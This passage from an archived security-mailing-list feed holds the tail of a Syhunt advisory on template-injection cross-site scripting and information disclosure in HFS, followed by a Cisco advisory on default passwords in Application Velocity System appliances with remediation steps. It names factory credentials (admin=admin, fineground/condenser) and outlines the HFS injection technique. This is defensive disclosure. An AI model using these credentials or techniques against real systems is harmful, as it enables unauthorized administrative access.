&lt;br&gt;hides what comes before the at (@) character and then only the
&lt;br&gt;host name remains visible in the address bar. Firefox will also
&lt;br&gt;resubmit the auth credentials everytime the host is visited
&lt;br&gt;during the current browser session (unless new credentials are
&lt;br&gt;supplied).
&lt;br&gt;&lt;br&gt;* User must be already logged in (via /~login) and the current
&lt;br&gt;(root) path should not be password protected in the HFS-VFS
&lt;br&gt;panel.
&lt;br&gt;&lt;br&gt;* If the host symbol is injected using this technique, HFS will
&lt;br&gt;recognize it as a HTML template and return the data provided in
&lt;br&gt;Host field of the request as part of the response body. The same
&lt;br&gt;happens if the host symbol has been included (after
&lt;br&gt;customization) in the current HFS HTML template.
&lt;br&gt;&lt;br&gt;Detection:
&lt;br&gt;&lt;a href=&quot;http://www.syhunt.com/advisories/hfshack.txt&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.syhunt.com/advisories/hfshack.txt&lt;/a&gt;&lt;br&gt;See the &amp;quot;checkxss&amp;quot; command
&lt;br&gt;&lt;br&gt;Sandcat can also be used to identify this issue:
&lt;br&gt;&lt;a href=&quot;http://www.syhunt.com/sandcat&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.syhunt.com/sandcat&lt;/a&gt;&lt;br&gt;&lt;br&gt;2) Information Disclosure
&lt;br&gt;&lt;br&gt;Example 1 - Injecting Symbols:
&lt;br&gt;&lt;a href=&quot;http://www.syhunt.com/advisories/hfshack.txt&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.syhunt.com/advisories/hfshack.txt&lt;/a&gt;&lt;br&gt;The &amp;quot;ver&amp;quot; command will force HFS to reveal its version and build
&lt;br&gt;The &amp;quot;symbols&amp;quot; command will force HFS to reveal additional
&lt;br&gt;details about the server (such as connections, timestamp, uptime,
&lt;br&gt;current outbound and inbound speed, and more).
&lt;br&gt;&lt;br&gt;* You can disable the &amp;quot;Send HFS identifier&amp;quot; option (which
&lt;br&gt;enables the HFS banner) and remove all server identifier
&lt;br&gt;symbols from the original HTML template, and still it will work.
&lt;br&gt;&lt;br&gt;Additional Considerations:
&lt;br&gt;* An updated IE will not accept basic auth via URL. See:
&lt;br&gt;&lt;a href=&quot;http://support.microsoft.com/kb/834489&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://support.microsoft.com/kb/834489&lt;/a&gt;&amp;nbsp;and the MS security
&lt;br&gt;update 832894 if you wish to learn about this subject.
&lt;br&gt;&lt;br&gt;----------------------------------------------------------------
&lt;br&gt;&lt;br&gt;Vulnerability Status:
&lt;br&gt;The vendor was contacted and has immediately released HFS 2.2c
&lt;br&gt;which fixes these problems. The new version can be downloaded at
&lt;br&gt;www.rejetto.com/hfs/download or via the &amp;quot;Check for news/updates&amp;quot;
&lt;br&gt;option in the HFS menu.
&lt;br&gt;&lt;br&gt;As a workaround for the affected releases, users should remove
&lt;br&gt;the %user% and %host% symbols from any HFS HTML templates.
&lt;br&gt;&lt;br&gt;Testers of HFS 2.3 Beta should upgrade to the latest 2.3 beta
&lt;br&gt;build.
&lt;br&gt;&lt;br&gt;HFS 2.3 Beta specifically is only affected if the option
&lt;br&gt;&amp;quot;Accept any login for unprotected resources&amp;quot; is enabled. This
&lt;br&gt;option, introduced in this version, is disabled by default.
&lt;br&gt;&lt;br&gt;----------------------------------------------------------------
&lt;br&gt;&lt;br&gt;Credit:
&lt;br&gt;Felipe Aragon and Alec Storm
&lt;br&gt;Syhunt Security Research Team, www.syhunt.com
&lt;br&gt;&lt;br&gt;---
&lt;br&gt;&lt;br&gt;Copyright © 2008 Syhunt Security
&lt;br&gt;&lt;br&gt;Disclaimer:
&lt;br&gt;The information in this advisory is provided &amp;quot;as is&amp;quot; without
&lt;br&gt;warranty of any kind. Details provided are strictly for
&lt;br&gt;educational and defensive purposes.
&lt;br&gt;&lt;br&gt;Syhunt is not liable for any damages caused by direct or
&lt;br&gt;indirect use of the information provided by this advisory.
&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Syhunt%3A-HFS-%28HTTP-File-Server%29-Template-Cross-Site-Scripting-and-Information-Disclosure-Vulnerabilities-tp15052276p15052276.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-15050308</id>
	<title>Cisco Security Advisory: Default Passwords in the Application Velocity System</title>
	<published>2008-01-23T09:28:29Z</published>
	<updated>2008-01-23T09:28:29Z</updated>
	<author>
		<name>Cisco Systems Product Security Incident Response Team</name>
	</author>
	<content type="html">-----BEGIN PGP SIGNED MESSAGE-----
&lt;br&gt;Hash: SHA1
&lt;br&gt;&lt;br&gt;Cisco Security Advisory: Default Passwords in the Application Velocity
&lt;br&gt;System
&lt;br&gt;&lt;br&gt;Advisory ID: cisco-sa-20080123-avs
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/warp/public/707/cisco-sa-20080123-avs.shtml&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/warp/public/707/cisco-sa-20080123-avs.shtml&lt;/a&gt;&lt;br&gt;&lt;br&gt;Revision 1.0
&lt;br&gt;&lt;br&gt;For Public Release 2008 January 23 1600 UTC (GMT)
&lt;br&gt;&lt;br&gt;+---------------------------------------------------------------------
&lt;br&gt;&lt;br&gt;Summary
&lt;br&gt;=======
&lt;br&gt;&lt;br&gt;Versions of the Cisco Application Velocity System (AVS) prior to
&lt;br&gt;software version AVS 5.1.0 do not prompt users to modify system account
&lt;br&gt;passwords during the initial configuration process. Because there is no
&lt;br&gt;requirement to change these credentials during the initial configuration
&lt;br&gt;process, an attacker may be able to leverage the accounts that have
&lt;br&gt;default credentials, some of which have root privileges, to take full
&lt;br&gt;administrative control of the AVS system.
&lt;br&gt;&lt;br&gt;After upgrading to software version AVS 5.1.0, users will be prompted to
&lt;br&gt;modify these credentials.
&lt;br&gt;&lt;br&gt;Cisco will make free upgrade software available to address this
&lt;br&gt;vulnerability for affected customers. The software upgrade will
&lt;br&gt;be applicable only for the AVS 3120, 3180, and 3180A systems. The
&lt;br&gt;workaround identified in this document describes how to change the
&lt;br&gt;passwords in current releases of software for the AVS 3110.
&lt;br&gt;&lt;br&gt;Common Vulnerabilities and Exposures (CVE) identifier CVE-2008-0029 has
&lt;br&gt;been assigned to this vulnerability.
&lt;br&gt;&lt;br&gt;This advisory is posted at
&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/warp/public/707/cisco-sa-20080123-avs.shtml&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/warp/public/707/cisco-sa-20080123-avs.shtml&lt;/a&gt;.
&lt;br&gt;&lt;br&gt;Affected Products
&lt;br&gt;=================
&lt;br&gt;&lt;br&gt;Vulnerable Products
&lt;br&gt;+------------------
&lt;br&gt;&lt;br&gt;This vulnerability affects the Cisco AVS 3110, 3120, 3180, and 3180A
&lt;br&gt;Management Station appliances that are running software versions prior
&lt;br&gt;to AVS 5.1.0. Administrators can determine the software version of the
&lt;br&gt;AVS appliances by logging in to the Management Station web-based user
&lt;br&gt;interface or from the command-line interface (CLI) of the appliance
&lt;br&gt;operating system.
&lt;br&gt;&lt;br&gt;Customers who use the AVS 3180 or 3180A Management Station can determine
&lt;br&gt;their node software versions by navigating to the Cluster Information
&lt;br&gt;Page. Each registered node will display the corresponding software
&lt;br&gt;version when the node is selected.
&lt;br&gt;&lt;br&gt;The AVS appliance version can also be determined from the host operating
&lt;br&gt;system by using the &amp;quot;Show Version&amp;quot; command.
&lt;br&gt;&lt;br&gt;The following example shows &amp;quot;Show Version&amp;quot; output for an AVS 3120
&lt;br&gt;appliance that is running version 5.1.0:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; velocity&amp;gt;Show Version
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; ****************************************
&lt;br&gt;&amp;nbsp; &amp;nbsp; Cisco Application Velocity System,(AVS)
&lt;br&gt;&amp;nbsp; &amp;nbsp; ----------------------------------------
&lt;br&gt;&amp;nbsp; &amp;nbsp; AVS 3120-K9 005.001(000.034)
&lt;br&gt;&amp;nbsp; &amp;nbsp; ****************************************
&lt;br&gt;&lt;br&gt;The following example shows &amp;quot;Show Version&amp;quot; output for an AVS 3180 or
&lt;br&gt;3180A appliance that is running version 5.1.0:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; velocity&amp;gt;Show Version
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; ****************************************
&lt;br&gt;&amp;nbsp; &amp;nbsp; Cisco Application Velocity System,(AVS)
&lt;br&gt;&amp;nbsp; &amp;nbsp; ----------------------------------------
&lt;br&gt;&amp;nbsp; &amp;nbsp; AVS 3180-MGMT 005.001(000.034)
&lt;br&gt;&amp;nbsp; &amp;nbsp; ****************************************
&lt;br&gt;&lt;br&gt;Products Confirmed Not Vulnerable
&lt;br&gt;+--------------------------------
&lt;br&gt;&lt;br&gt;No other Cisco products are currently known to be affected by this
&lt;br&gt;vulnerability.
&lt;br&gt;&lt;br&gt;Details
&lt;br&gt;=======
&lt;br&gt;&lt;br&gt;The Cisco AVS 3110 and 3120 are enterprise data center appliances for
&lt;br&gt;improving web application performance, measuring end-user response
&lt;br&gt;time, and managing application security. The Cisco AVS 3120 enforces
&lt;br&gt;application security with an integrated web application firewall. The
&lt;br&gt;Cisco AVS 3180 and 3180A Management Stations provide web-based tools for
&lt;br&gt;the configuration and application performance monitoring for a cluster
&lt;br&gt;of AVS 3110s and 3120s or individual nodes.
&lt;br&gt;&lt;br&gt;The Cisco AVS 3110, 3120, 3180, and 3180A Management Stations use some
&lt;br&gt;system accounts that are initially configured with default passwords.
&lt;br&gt;Vulnerable versions of the AVS software do not prompt the administrator
&lt;br&gt;to change the passwords for these accounts, including accounts with root
&lt;br&gt;privileges, during the initial configuration process. Non-vulnerable
&lt;br&gt;versions of AVS software will now prompt administrators to change these
&lt;br&gt;accounts after installation.
&lt;br&gt;&lt;br&gt;Note: If the passwords for the AVS 3110 or 3120 are changed on the
&lt;br&gt;device itself and it has previously been registered with an AVS 3180
&lt;br&gt;or 3180A Management Station, the node must be re-registered with the
&lt;br&gt;Management Station console. Otherwise, communication between the AVS
&lt;br&gt;3180 or 3180A Management Station and AVS 3110 or 3120 node will be lost.
&lt;br&gt;&lt;br&gt;For additional details about the AVS node registration process, refer to
&lt;br&gt;the &amp;quot;Register Node&amp;quot; section of the Cisco AVS User's Guide.
&lt;br&gt;&lt;br&gt;After upgrading the appliance software to version AVS 5.1.0 and logging
&lt;br&gt;in for the first time, the administrator will now be prompted to change
&lt;br&gt;the system account passwords.
&lt;br&gt;&lt;br&gt;The following example shows the new password change prompts and the
&lt;br&gt;subsequent password change dialog for the AVS 3120 after upgrade:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; velocity login: fgn
&lt;br&gt;&amp;nbsp; &amp;nbsp; Password:
&lt;br&gt;&amp;nbsp; &amp;nbsp; **WARNING** System wide secrets are in factory default state.
&lt;br&gt;&amp;nbsp; &amp;nbsp; Would you like to change these now? [y/n] y changing root password
&lt;br&gt;&amp;nbsp; &amp;nbsp; enter password:
&lt;br&gt;&amp;nbsp; &amp;nbsp; enter password again:
&lt;br&gt;&amp;nbsp; &amp;nbsp; changing fgn password
&lt;br&gt;&amp;nbsp; &amp;nbsp; enter password:
&lt;br&gt;&amp;nbsp; &amp;nbsp; enter password again:
&lt;br&gt;&amp;nbsp; &amp;nbsp; changing DB password
&lt;br&gt;&amp;nbsp; &amp;nbsp; enter password:
&lt;br&gt;&amp;nbsp; &amp;nbsp; enter password again:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Please wait...The DB password change will take a few minutes.
&lt;br&gt;&amp;nbsp; &amp;nbsp; changing node manager password
&lt;br&gt;&amp;nbsp; &amp;nbsp; enter password:
&lt;br&gt;&amp;nbsp; &amp;nbsp; enter password again:
&lt;br&gt;&amp;nbsp; &amp;nbsp; changing condenser password
&lt;br&gt;&amp;nbsp; &amp;nbsp; enter password:
&lt;br&gt;&amp;nbsp; &amp;nbsp; enter password again:
&lt;br&gt;&amp;nbsp; &amp;nbsp; changing console password
&lt;br&gt;&amp;nbsp; &amp;nbsp; enter password:
&lt;br&gt;&amp;nbsp; &amp;nbsp; enter password again:
&lt;br&gt;&lt;br&gt;The following example shows the new password change prompts and the
&lt;br&gt;subsequent password change dialog for the AVS 3180 and 3180A after
&lt;br&gt;upgrade:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; velocity login: fgn
&lt;br&gt;&amp;nbsp; &amp;nbsp; Password:
&lt;br&gt;&amp;nbsp; &amp;nbsp; **WARNING** System wide secrets are in factory default state.
&lt;br&gt;&amp;nbsp; &amp;nbsp; Would you like to change these now? [y/n] y changing root password
&lt;br&gt;&amp;nbsp; &amp;nbsp; enter password:
&lt;br&gt;&amp;nbsp; &amp;nbsp; enter password again:
&lt;br&gt;&amp;nbsp; &amp;nbsp; changing fgn password
&lt;br&gt;&amp;nbsp; &amp;nbsp; enter password:
&lt;br&gt;&amp;nbsp; &amp;nbsp; enter password again:
&lt;br&gt;&amp;nbsp; &amp;nbsp; changing DB password
&lt;br&gt;&amp;nbsp; &amp;nbsp; enter password:
&lt;br&gt;&amp;nbsp; &amp;nbsp; enter password again:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Please wait...The DB password change will take a few minutes.
&lt;br&gt;&amp;nbsp; &amp;nbsp; changing console password
&lt;br&gt;&amp;nbsp; &amp;nbsp; enter password:
&lt;br&gt;&amp;nbsp; &amp;nbsp; enter password again:
&lt;br&gt;&lt;br&gt;This issue is documented in Cisco Bug ID CSCsd94732.
&lt;br&gt;&lt;br&gt;Vulnerability Scoring Details
&lt;br&gt;+----------------------------
&lt;br&gt;&lt;br&gt;Cisco has provided scores for the vulnerabilities in this advisory based
&lt;br&gt;on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in
&lt;br&gt;this Security Advisory is done in accordance with CVSS version 2.0.
&lt;br&gt;&lt;br&gt;CVSS is a standards-based scoring method that conveys vulnerability
&lt;br&gt;severity and helps determine urgency and priority of response.
&lt;br&gt;&lt;br&gt;Cisco has provided a base and temporal score. Customers can then
&lt;br&gt;compute environmental scores to assist in determining the impact of the
&lt;br&gt;vulnerability in individual networks.
&lt;br&gt;&lt;br&gt;Cisco has provided an FAQ to answer additional questions regarding CVSS
&lt;br&gt;at
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html&lt;/a&gt;.
&lt;br&gt;&lt;br&gt;Cisco has also provided a CVSS calculator to help compute the
&lt;br&gt;environmental impact for individual networks at
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://intellishield.cisco.com/security/alertmanager/cvss&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://intellishield.cisco.com/security/alertmanager/cvss&lt;/a&gt;.
&lt;br&gt;&lt;br&gt;* AVS Default Account Passwords Don't Require Change (CSCsd94732)
&lt;br&gt;&lt;br&gt;CVSS Base Score - 10.0
&lt;br&gt;&amp;nbsp; &amp;nbsp; Access Vector - &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Network
&lt;br&gt;&amp;nbsp; &amp;nbsp; Access Complexity - &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Low
&lt;br&gt;&amp;nbsp; &amp;nbsp; Authentication - &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; None
&lt;br&gt;&amp;nbsp; &amp;nbsp; Confidentiality Impact - &amp;nbsp; Complete
&lt;br&gt;&amp;nbsp; &amp;nbsp; Integrity Impact - &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Complete
&lt;br&gt;&amp;nbsp; &amp;nbsp; Availability Impact - &amp;nbsp; &amp;nbsp; &amp;nbsp;Complete
&lt;br&gt;&lt;br&gt;CVSS Temporal Score - 8.3
&lt;br&gt;&amp;nbsp; &amp;nbsp; Exploitability - &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Functional
&lt;br&gt;&amp;nbsp; &amp;nbsp; Remediation Level - &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Official-Fix
&lt;br&gt;&amp;nbsp; &amp;nbsp; Report Confidence - &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Confirmed
&lt;br&gt;&lt;br&gt;Impact
&lt;br&gt;======
&lt;br&gt;&lt;br&gt;Successful exploitation of the vulnerability may result in full
&lt;br&gt;administrative control of the Cisco AVS system or user-level access to
&lt;br&gt;the host operating system.
&lt;br&gt;&lt;br&gt;Software Versions and Fixes
&lt;br&gt;===========================
&lt;br&gt;&lt;br&gt;When considering software upgrades, also consult
&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/go/psirt&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/go/psirt&lt;/a&gt;&amp;nbsp;and any subsequent advisories to determine
&lt;br&gt;exposure and a complete upgrade solution.
&lt;br&gt;&lt;br&gt;In all cases, customers should exercise caution to be certain the
&lt;br&gt;devices to be upgraded contain sufficient memory and that current
&lt;br&gt;hardware and software configurations will continue to be supported
&lt;br&gt;properly by the new release. If the information is not clear, contact
&lt;br&gt;the Cisco Technical Assistance Center (TAC) or your contracted
&lt;br&gt;maintenance provider for assistance.
&lt;br&gt;&lt;br&gt;AVS software version 5.1.0 contains the fix for the vulnerability
&lt;br&gt;described in this document.
&lt;br&gt;&lt;br&gt;AVS software is available for download from the following locations on
&lt;br&gt;cisco.com:
&lt;br&gt;&lt;br&gt;&amp;nbsp; * AVS 3120 5.1.0 (&lt;a href=&quot;http://www.cisco.com/pcgi-bin/tablebuild.pl/AVS3120-5.1&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/pcgi-bin/tablebuild.pl/AVS3120-5.1&lt;/a&gt;)
&lt;br&gt;&amp;nbsp; * AVS 3180 5.1.0 (&lt;a href=&quot;http://www.cisco.com/pcgi-bin/tablebuild.pl/AVS3180-5.1&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/pcgi-bin/tablebuild.pl/AVS3180-5.1&lt;/a&gt;)
&lt;br&gt;&lt;br&gt;Workarounds
&lt;br&gt;===========
&lt;br&gt;&lt;br&gt;The following workarounds are applicable only for the AVS 3110 and are
&lt;br&gt;performed on the system shell. The AVS 3110 does not have a CLI. The use
&lt;br&gt;of strong passwords is encouraged.
&lt;br&gt;&lt;br&gt;Changing the Root Password
&lt;br&gt;+-------------------------
&lt;br&gt;&lt;br&gt;Complete these steps:
&lt;br&gt;&lt;br&gt;&amp;nbsp;1. Change the root password by using the following command:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; shell# passwd
&lt;br&gt;&lt;br&gt;&lt;br&gt;&amp;nbsp;2. Reboot to activate the new settings by using the following command:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; shell# reboot
&lt;br&gt;&lt;br&gt;Changing the Management Console Username and Password
&lt;br&gt;+----------------------------------------------------
&lt;br&gt;&lt;br&gt;Complete these steps:
&lt;br&gt;&lt;br&gt;&amp;nbsp;1. Open the following file in a text editor:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; $AVS_HOME/console/jboss-3.0.1_tomcat-4.0.4/server/default/deploy/
&lt;br&gt;&amp;nbsp; &amp;nbsp; fgconsole.war/users.properties
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Use the line admin=admin to set the username and password. The
&lt;br&gt;&amp;nbsp; &amp;nbsp; username appears before the equal sign (=) and the password appears
&lt;br&gt;&amp;nbsp; &amp;nbsp; after the equal sign (=). For example, to change the username to
&lt;br&gt;&amp;nbsp; &amp;nbsp; Cisco and the password to accelerate, change the admin=admin line
&lt;br&gt;&amp;nbsp; &amp;nbsp; to Cisco=accelerate.
&lt;br&gt;&lt;br&gt;&amp;nbsp;2. If you change the username, you must also change this file:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; $AVS_HOME/console/jboss-3.0.1_tomcat-4.0.4/server/default/deploy/
&lt;br&gt;&amp;nbsp; &amp;nbsp; fgconsole.war/roles.properties
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; The username is set by the line that contains admin=. The username
&lt;br&gt;&amp;nbsp; &amp;nbsp; appears before the equal sign (=). For example, to change the user
&lt;br&gt;&amp;nbsp; &amp;nbsp; name to Cisco, change the admin= line to Cisco=. Do not change the
&lt;br&gt;&amp;nbsp; &amp;nbsp; text after the equal sign (=) in this file; this field specifies
&lt;br&gt;&amp;nbsp; &amp;nbsp; the account privileges. The username that you enter here must match
&lt;br&gt;&amp;nbsp; &amp;nbsp; the one in the users.properties file in the preceding step.
&lt;br&gt;&lt;br&gt;Changing the Database Username and Password
&lt;br&gt;+------------------------------------------
&lt;br&gt;&lt;br&gt;There are two steps required to change the database password:
&lt;br&gt;&lt;br&gt;&amp;nbsp;1. First change the database password.
&lt;br&gt;&amp;nbsp;2. Then update the Management Console configuration file with the new
&lt;br&gt;&amp;nbsp; &amp;nbsp; database password.
&lt;br&gt;&lt;br&gt;Complete these steps:
&lt;br&gt;&lt;br&gt;&amp;nbsp;1. Log in to the database using the old password, and then use the
&lt;br&gt;&amp;nbsp; &amp;nbsp; alter SQL command to change to the new password.
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; /usr/local/fineground/console/postgres/bin/psql
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;-U fineground -p 5432 fgnlog Password : &amp;lt;old password&amp;gt;
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Welcome to psql 7.3.4, the PostgreSQL interactive terminal.
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Type: &amp;nbsp;\copyright for distribution terms
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;\h for help with SQL commands
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;\? for help on internal slash commands
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;\g or terminate with semicolon to execute query
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;\q to quit
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; fgnlog=# alter user fineground password '&amp;lt;new password&amp;gt;'; \q
&lt;br&gt;&lt;br&gt;&amp;nbsp;2. The username and password to access the Management Console database
&lt;br&gt;&amp;nbsp; &amp;nbsp; are set during the Management Console installation process. If you
&lt;br&gt;&amp;nbsp; &amp;nbsp; want to change these later, you can modify an XML configuration
&lt;br&gt;&amp;nbsp; &amp;nbsp; file that the Management Console server reads at start-up.
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;a. Open the following file in a text editor:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; $AVS_HOME/console/jboss-3.0.1_tomcat-4.0.4/server/default/
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; deploy/postgres-service.xml
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Look for the following section in this file:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;lt;!--set these only if you want only default logins,
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;not through JAAS --&amp;gt;
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;lt;config-property name=&amp;quot;UserName&amp;quot; type=&amp;quot;java.lang.String&amp;quot;&amp;gt;fineground&amp;lt;/config-property&amp;gt;
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;lt;config-property name=&amp;quot;Password&amp;quot; type=&amp;quot;java.lang.String&amp;quot;&amp;gt;condenser&amp;lt;/config-property&amp;gt;
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;b. To change the username, change the value for the UserName
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; configuration property (fineground in this example).
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;c. To change the password, change the value for the Password
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; configuration property (condenser in this example).
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;d. Save and close the file.
&lt;br&gt;&lt;br&gt;Changing the Node Manager Password
&lt;br&gt;+---------------------------------
&lt;br&gt;&lt;br&gt;Complete these steps:
&lt;br&gt;&lt;br&gt;&amp;nbsp;1. Log in as fgn, and then use the su command to switch to the
&lt;br&gt;&amp;nbsp; &amp;nbsp; superuser.
&lt;br&gt;&lt;br&gt;&amp;nbsp;2. Stop the Condenser and Node Manager:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; /etc/init.d/fgnpn&amp;lt;Tab&amp;gt; stop
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Press Tab to have the interface complete the command.
&lt;br&gt;&lt;br&gt;&amp;nbsp;3. Go to the $AVS_HOME/perfnode/node_manager/conf directory.
&lt;br&gt;&lt;br&gt;&amp;nbsp;4. Back up the file named passwords.
&lt;br&gt;&lt;br&gt;&amp;nbsp;5. Change the password with the following command:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; $AVS_HOME/perfnode/bin/htpasswd -bcm passwords.new admin &amp;lt;password&amp;gt;
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; In the preceding command, passwords.new is the name of the file in
&lt;br&gt;&amp;nbsp; &amp;nbsp; which the passwords are stored. Currently only the user admin is
&lt;br&gt;&amp;nbsp; &amp;nbsp; supported.
&lt;br&gt;&lt;br&gt;&amp;nbsp;6. Install the file with the following command:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; install -m 400 -o nobody -g nobody passwords.new &amp;nbsp;passwords
&lt;br&gt;&lt;br&gt;&amp;nbsp;7. Restart the appliance with the reboot command.
&lt;br&gt;&lt;br&gt;&amp;nbsp;8. Re-register the node from the Management Console for which the node
&lt;br&gt;&amp;nbsp; &amp;nbsp; manager password was changed.
&lt;br&gt;&lt;br&gt;Changing the Condenser Password
&lt;br&gt;+------------------------------
&lt;br&gt;&lt;br&gt;Complete these steps:
&lt;br&gt;&lt;br&gt;&amp;nbsp;1. Log in as fgn, and then use the su command to switch to the
&lt;br&gt;&amp;nbsp; &amp;nbsp; superuser.
&lt;br&gt;&lt;br&gt;&amp;nbsp;2. Stop the Condenser and Node Manager:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; /etc/init.d/fgnpn&amp;lt;TAB&amp;gt; stop
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Press Tab to have the interface complete the command.
&lt;br&gt;&lt;br&gt;&amp;nbsp;3. Go to the $AVS_HOME/perfnode/passwd directory.
&lt;br&gt;&lt;br&gt;&amp;nbsp;4. Backup the file named .htpasswd.
&lt;br&gt;&lt;br&gt;&amp;nbsp;5. Change the password with the following command:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; $AVS_HOME/perfnode/bin/htpasswd -bcm passwords.new fineground &amp;lt;password&amp;gt;
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; In the preceding command, passwords.new is the name of the file in
&lt;br&gt;&amp;nbsp; &amp;nbsp; which the passwords are stored. Currently only the user fineground
&lt;br&gt;&amp;nbsp; &amp;nbsp; is supported.
&lt;br&gt;&lt;br&gt;&amp;nbsp;6. Install the file with the following command:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; install -m 400 -o nobody -g nobody passwords.new &amp;nbsp;.htpasswd
&lt;br&gt;&lt;br&gt;&amp;nbsp;7. Restart the appliance with the reboot command.
